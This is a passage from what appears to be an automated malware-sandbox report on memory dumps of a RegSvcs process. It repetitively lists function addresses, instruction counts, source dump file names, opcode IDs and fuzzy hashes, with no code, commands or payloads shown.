                                                                                            • Source File: 00000008.00000002.1773673335.0000000000F66000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F40000, based on PE: true
                                                                                            • Associated: 00000008.00000002.1773673335.0000000000F40000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.1773673335.0000000000F47000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.1773673335.0000000001069000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.1773673335.000000000106D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.1773673335.00000000010DE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_8_2_f40000_RegSvcs.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: d1847585b0ae176301b743aea480a4d236b47bc6fa424c0ad76f832c12baba18
                                                                                            • Instruction ID: 8297c1481b907957b4db45eea7e000519b2ed6baebdc66057448d3fb10e117d2
                                                                                            • Opcode Fuzzy Hash: d1847585b0ae176301b743aea480a4d236b47bc6fa424c0ad76f832c12baba18
                                                                                            • Instruction Fuzzy Hash: 9F8190B1A0461A9BDB18CF69CA41BBEB7F9FB48710F00842EE445E7640E734ED41DB94
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 0103AB40 Relevance: .2, Instructions: 222COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000008.00000002.1773673335.0000000000F66000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F40000, based on PE: true
                                                                                            • Associated: 00000008.00000002.1773673335.0000000000F40000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.1773673335.0000000000F47000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.1773673335.0000000001069000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.1773673335.000000000106D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.1773673335.00000000010DE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_8_2_f40000_RegSvcs.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: e20f57e4ff007d65908e0e6f7ea2c5d260c397918ed067619b1479e5480266a4
                                                                                            • Instruction ID: 9ace0b6193d1fcf2b4f0e24ef409eeccaf37f4f0cfb79e7fe1a297d9835d6f5d
                                                                                            • Opcode Fuzzy Hash: e20f57e4ff007d65908e0e6f7ea2c5d260c397918ed067619b1479e5480266a4
                                                                                            • Instruction Fuzzy Hash: CD816D31B10209DBDB19DF99C881AAEBBFAAFC4310F1885A9D996DB345D734E901CB50
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 00FAE284 Relevance: .2, Instructions: 212COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000008.00000002.1773673335.0000000000F66000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F40000, based on PE: true
                                                                                            • Associated: 00000008.00000002.1773673335.0000000000F40000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.1773673335.0000000000F47000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.1773673335.0000000001069000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.1773673335.000000000106D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.1773673335.00000000010DE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_8_2_f40000_RegSvcs.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: ac51282955962cab0f112f17f44ebc6a3edcd7a956de5ebe60014576879014fa
                                                                                            • Instruction ID: 5f95fd237fc1869e23d09ea5aeebe0e143ef5221b72b518c51ba86c2a5c0a2f1
                                                                                            • Opcode Fuzzy Hash: ac51282955962cab0f112f17f44ebc6a3edcd7a956de5ebe60014576879014fa
                                                                                            • Instruction Fuzzy Hash: 48816DB1A00709AFDB25CFA5C880BEEBBF9FF89350F104429E555A7250DB70AC45EB60
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 00F764AB Relevance: .2, Instructions: 211COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000008.00000002.1773673335.0000000000F66000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F40000, based on PE: true
                                                                                            • Associated: 00000008.00000002.1773673335.0000000000F40000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.1773673335.0000000000F47000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.1773673335.0000000001069000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.1773673335.000000000106D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.1773673335.00000000010DE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_8_2_f40000_RegSvcs.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: f7bb0c69882a5c0fbaa7125f5dbdd20505f7295ad6b42905f8665785a4172636
                                                                                            • Instruction ID: e17917e722de02ca153cdbba4c8add4447c6fb5300410f0c76e2bbceeaef2709
                                                                                            • Opcode Fuzzy Hash: f7bb0c69882a5c0fbaa7125f5dbdd20505f7295ad6b42905f8665785a4172636
                                                                                            • Instruction Fuzzy Hash: C071CEB19047049FCB20EF14C885F9B7BA9AF84760F14446AF9488B286D738D588FBD2
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 00F8C640 Relevance: .2, Instructions: 206COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000008.00000002.1773673335.0000000000F66000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F40000, based on PE: true
                                                                                            • Associated: 00000008.00000002.1773673335.0000000000F40000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.1773673335.0000000000F47000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.1773673335.0000000001069000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.1773673335.000000000106D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.1773673335.00000000010DE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_8_2_f40000_RegSvcs.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 7444844646c84eeefc90b3e99f9e184967e443b649b6336260b5763d747c71bd
                                                                                            • Instruction ID: 4e7717b6927e59be217e00f10134d4c1aaa7848690e99d22e8d0b5b0e82dd598
                                                                                            • Opcode Fuzzy Hash: 7444844646c84eeefc90b3e99f9e184967e443b649b6336260b5763d747c71bd
                                                                                            • Instruction Fuzzy Hash: 7971D175D00225DBCB259F59C8907FEBBB6FF58750F24412AE842AB390D7359801EBE0
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 010247A0 Relevance: .2, Instructions: 202COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000008.00000002.1773673335.0000000000F66000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F40000, based on PE: true
                                                                                            • Associated: 00000008.00000002.1773673335.0000000000F40000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.1773673335.0000000000F47000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.1773673335.0000000001069000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.1773673335.000000000106D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.1773673335.00000000010DE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_8_2_f40000_RegSvcs.jbxd
                                                                                            Similarity
                                                                                            • API ID: InitializeThunk
                                                                                            • String ID:
                                                                                            • API String ID: 2994545307-0
                                                                                            • Opcode ID: e8bb2f54cab9fafe6f60bc3b27cfa2bbc8bc93b5d306f92acef1a692517b523b
                                                                                            • Instruction ID: 6b323758c5f2a53e181842e42a6b840a377bca91f0ce19a24c73185f1d147aac
                                                                                            • Opcode Fuzzy Hash: e8bb2f54cab9fafe6f60bc3b27cfa2bbc8bc93b5d306f92acef1a692517b523b
                                                                                            • Instruction Fuzzy Hash: 3771A0B0E00215EFDB60DF99DA41A9ABBF8FF94310F11419AE690EB269C7778940CF54
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 00F8260B Relevance: .2, Instructions: 201COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000008.00000002.1773673335.0000000000F66000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F40000, based on PE: true
                                                                                            • Associated: 00000008.00000002.1773673335.0000000000F40000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.1773673335.0000000000F47000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.1773673335.0000000001069000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.1773673335.000000000106D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.1773673335.00000000010DE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_8_2_f40000_RegSvcs.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 81f13a0ffc58bfdb890237eceac3ee5b90a594b7bc499339e32842e109c319b6
                                                                                            • Instruction ID: 1fb75214bf3306c013e5a49858ff52589b7dab49a815899a6728bdee74112f0d
                                                                                            • Opcode Fuzzy Hash: 81f13a0ffc58bfdb890237eceac3ee5b90a594b7bc499339e32842e109c319b6
                                                                                            • Instruction Fuzzy Hash: 4271D471A042418FC751EF29C484BAAB7E5FF84310F0985AAF895CB352EB38EC45DB91
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 00FAA660 Relevance: .2, Instructions: 200COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000008.00000002.1773673335.0000000000F66000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F40000, based on PE: true
                                                                                            • Associated: 00000008.00000002.1773673335.0000000000F40000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.1773673335.0000000000F47000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.1773673335.0000000001069000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.1773673335.000000000106D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.1773673335.00000000010DE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_8_2_f40000_RegSvcs.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: d3bb4c0a79e467e3dcf5803a5e75e0e8e0cd6c11e203f995707bebd81173f037
                                                                                            • Instruction ID: 5672db2b356bd288baf7bc28fcb3d0de199094eb47f56c22868e4e6441f7ac65
                                                                                            • Opcode Fuzzy Hash: d3bb4c0a79e467e3dcf5803a5e75e0e8e0cd6c11e203f995707bebd81173f037
                                                                                            • Instruction Fuzzy Hash: D2716E75E0024ACFDF28CF9AC9906ADBBB1BF68794F24812EE405E7241DB359D41EB50
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 010062A0 Relevance: .2, Instructions: 198COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000008.00000002.1773673335.0000000000F66000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F40000, based on PE: true
                                                                                            • Associated: 00000008.00000002.1773673335.0000000000F40000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.1773673335.0000000000F47000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.1773673335.0000000001069000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.1773673335.000000000106D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.1773673335.00000000010DE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_8_2_f40000_RegSvcs.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: e0a3f73adc29e0c40d19ffa79379a32906fb1545d18a8c1b82012a7612afffc4
                                                                                            • Instruction ID: 5421b98c3dd6ed800f33c0bba4770e94c8274584a0cb1106a8c125714b3be382
                                                                                            • Opcode Fuzzy Hash: e0a3f73adc29e0c40d19ffa79379a32906fb1545d18a8c1b82012a7612afffc4
                                                                                            • Instruction Fuzzy Hash: E771D032200A01AFEB339F18CC45F5ABBE7AB44720F158458E2969B2E1DB76E954DB50
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 00FF035C Relevance: .2, Instructions: 198COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000008.00000002.1773673335.0000000000F66000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F40000, based on PE: true
                                                                                            • Associated: 00000008.00000002.1773673335.0000000000F40000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.1773673335.0000000000F47000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.1773673335.0000000001069000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.1773673335.000000000106D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.1773673335.00000000010DE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_8_2_f40000_RegSvcs.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: f01f26b9d4523bb8af8d0dc1087c2bf1dc413617a4b2b84ce5c3b8fc37ed168b
                                                                                            • Instruction ID: 8baae05cb92e0cf199a5c638c90d1e281b1fa061c711d64a6012f22d2374ab57
                                                                                            • Opcode Fuzzy Hash: f01f26b9d4523bb8af8d0dc1087c2bf1dc413617a4b2b84ce5c3b8fc37ed168b
                                                                                            • Instruction Fuzzy Hash: 43715D71A00619EFCB10DFA9C985AEEBBB9FF48700F144569E605A7261DB34EA01DB50
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 00F78AA0 Relevance: .2, Instructions: 197COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000008.00000002.1773673335.0000000000F66000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F40000, based on PE: true
                                                                                            • Associated: 00000008.00000002.1773673335.0000000000F40000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.1773673335.0000000000F47000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.1773673335.0000000001069000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.1773673335.000000000106D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.1773673335.00000000010DE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_8_2_f40000_RegSvcs.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 0579c7a560543272826d82984eebd8f64b6317a6b84be4192c8ebd0b40bc4b58
                                                                                            • Instruction ID: 60d48ad44d3cff4626c3332f07867a22b6c85f7dabb06225c16db13d11e0a7f1
                                                                                            • Opcode Fuzzy Hash: 0579c7a560543272826d82984eebd8f64b6317a6b84be4192c8ebd0b40bc4b58
                                                                                            • Instruction Fuzzy Hash: 1A81A372A043158FDB25CF58D588B6D77B2BF98321F19412AE804AB391C7799D41EBD0
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 01048324 Relevance: .2, Instructions: 192COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000008.00000002.1773673335.0000000000F66000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F40000, based on PE: true
                                                                                            • Associated: 00000008.00000002.1773673335.0000000000F40000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.1773673335.0000000000F47000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.1773673335.0000000001069000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.1773673335.000000000106D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.1773673335.00000000010DE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_8_2_f40000_RegSvcs.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: aedec857b1ad2659535974ef05a1e769398202d64f274ffda948a842e2f477e1
                                                                                            • Instruction ID: 6bfb6fce9e8e8467ebcdf6ac4ad1e7287583e0ff37c2ead4c9b1ba68fb63abd8
                                                                                            • Opcode Fuzzy Hash: aedec857b1ad2659535974ef05a1e769398202d64f274ffda948a842e2f477e1
                                                                                            • Instruction Fuzzy Hash: 867109B1E00209BFDB56DF95CC81FEEBBB8FB04750F10856AF650A6290D774AA05CB90
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 00F80A5B Relevance: .2, Instructions: 190COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000008.00000002.1773673335.0000000000F66000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F40000, based on PE: true
                                                                                            • Associated: 00000008.00000002.1773673335.0000000000F40000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.1773673335.0000000000F47000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.1773673335.0000000001069000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.1773673335.000000000106D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.1773673335.00000000010DE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_8_2_f40000_RegSvcs.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 1d3cd5fbbc2025b9bf9805741dd1c3d80ef9888f23757ce1c22f2995b269178d
                                                                                            • Instruction ID: 54ad5df7ce6195d75fd805ba67b6340c1367d6d7fda9fbdcdc36b3ebbc3e6191
                                                                                            • Opcode Fuzzy Hash: 1d3cd5fbbc2025b9bf9805741dd1c3d80ef9888f23757ce1c22f2995b269178d
                                                                                            • Instruction Fuzzy Hash: 3561E2316007019FDB68DF24C841BAABBE2FF44714F14846AE495CF392CB74E885EB91
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 00F861D1 Relevance: .2, Instructions: 186COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000008.00000002.1773673335.0000000000F66000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F40000, based on PE: true
                                                                                            • Associated: 00000008.00000002.1773673335.0000000000F40000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.1773673335.0000000000F47000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.1773673335.0000000001069000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.1773673335.000000000106D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.1773673335.00000000010DE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_8_2_f40000_RegSvcs.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 3b85d472d1d046c7366e13e67c5b379d3efb944348630411e460d508e9a48185
                                                                                            • Instruction ID: d4fe13ec46636329f5d18078907022b831a247a1c304fced5b92e99dfb3f5e98
                                                                                            • Opcode Fuzzy Hash: 3b85d472d1d046c7366e13e67c5b379d3efb944348630411e460d508e9a48185
                                                                                            • Instruction Fuzzy Hash: 4A717C35E016268FCB25EF98C8507EDB3B2BF85714F244558D896EB344CB74AD42EB80
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 0102A250 Relevance: .2, Instructions: 184COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000008.00000002.1773673335.0000000000F66000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F40000, based on PE: true
                                                                                            • Associated: 00000008.00000002.1773673335.0000000000F40000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.1773673335.0000000000F47000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.1773673335.0000000001069000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.1773673335.000000000106D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.1773673335.00000000010DE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_8_2_f40000_RegSvcs.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 58a355900f9e0a456b2d37b83569c890723844955e616097bc5ed4cb05de3549
                                                                                            • Instruction ID: 35b84924a38a6be7f4364d6574fe2334fd8270666599f7c756accbbd08cfcd26
                                                                                            • Opcode Fuzzy Hash: 58a355900f9e0a456b2d37b83569c890723844955e616097bc5ed4cb05de3549
                                                                                            • Instruction Fuzzy Hash: 2151BE72604622EFD311DA68C844B5BB7E8EBC9750F000969FA80DB150DF75ED05CBA2
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 00FEE6F2 Relevance: .2, Instructions: 179COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000008.00000002.1773673335.0000000000F66000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F40000, based on PE: true
                                                                                            • Associated: 00000008.00000002.1773673335.0000000000F40000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.1773673335.0000000000F47000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.1773673335.0000000001069000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.1773673335.000000000106D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.1773673335.00000000010DE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_8_2_f40000_RegSvcs.jbxd
                                                                                            Similarity
                                                                                            • API ID: InitializeThunk
                                                                                            • String ID:
                                                                                            • API String ID: 2994545307-0
                                                                                            • Opcode ID: 3335401f9ba7391bc3be4ab881330c677e6d1fe3ee20ecb4e8ef70ba36828b74
                                                                                            • Instruction ID: cbbddffdbff9447fc5c119c9b8a23ba55fe58363ffa991e5541cd6de9bbe1e83
                                                                                            • Opcode Fuzzy Hash: 3335401f9ba7391bc3be4ab881330c677e6d1fe3ee20ecb4e8ef70ba36828b74
                                                                                            • Instruction Fuzzy Hash: C2616D72E002589FDB14DFA9D841BADBBB9FB44740F20406DE559EB291D731EE00EB50
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 01018350 Relevance: .2, Instructions: 161COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000008.00000002.1773673335.0000000000F66000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F40000, based on PE: true
                                                                                            • Associated: 00000008.00000002.1773673335.0000000000F40000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.1773673335.0000000000F47000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.1773673335.0000000001069000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.1773673335.000000000106D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.1773673335.00000000010DE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_8_2_f40000_RegSvcs.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 5243efbc066a5417002a96220e1559988f68c2578b92b197e6b18769cc2d25a8
                                                                                            • Instruction ID: ada496889153ce20f7f17f86d53498e8db38034d003d48e0a1477cd2b285978e
                                                                                            • Opcode Fuzzy Hash: 5243efbc066a5417002a96220e1559988f68c2578b92b197e6b18769cc2d25a8
                                                                                            • Instruction Fuzzy Hash: 8751C170900705DFD721DF9AC880AABFBF8BF94710F10861FE296976A5CBB4A645CB50
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 00FAE443 Relevance: .2, Instructions: 158COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000008.00000002.1773673335.0000000000F66000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F40000, based on PE: true
                                                                                            • Associated: 00000008.00000002.1773673335.0000000000F40000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.1773673335.0000000000F47000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.1773673335.0000000001069000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.1773673335.000000000106D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.1773673335.00000000010DE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_8_2_f40000_RegSvcs.jbxd
                                                                                            Similarity
                                                                                            • API ID: InitializeThunk
                                                                                            • String ID:
                                                                                            • API String ID: 2994545307-0
                                                                                            • Opcode ID: e6fb17895732609d819e72153c0b44ca7e97d3e41738baec1344ee1af2b8d858
                                                                                            • Instruction ID: 95397d9792b24db12f80f997472997cea0cab81a0c62107ebacd1d9a5dde9af5
                                                                                            • Opcode Fuzzy Hash: e6fb17895732609d819e72153c0b44ca7e97d3e41738baec1344ee1af2b8d858
                                                                                            • Instruction Fuzzy Hash: 9B514AB1A00A45DFCB21EF65D981EAAB3F9FF09794F500429E54197261D738EE40EB60
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 01014180 Relevance: .2, Instructions: 156COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000008.00000002.1773673335.0000000000F66000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F40000, based on PE: true
                                                                                            • Associated: 00000008.00000002.1773673335.0000000000F40000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.1773673335.0000000000F47000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.1773673335.0000000001069000.00000040.00001000.00020000.00000000.sdmpDownload File
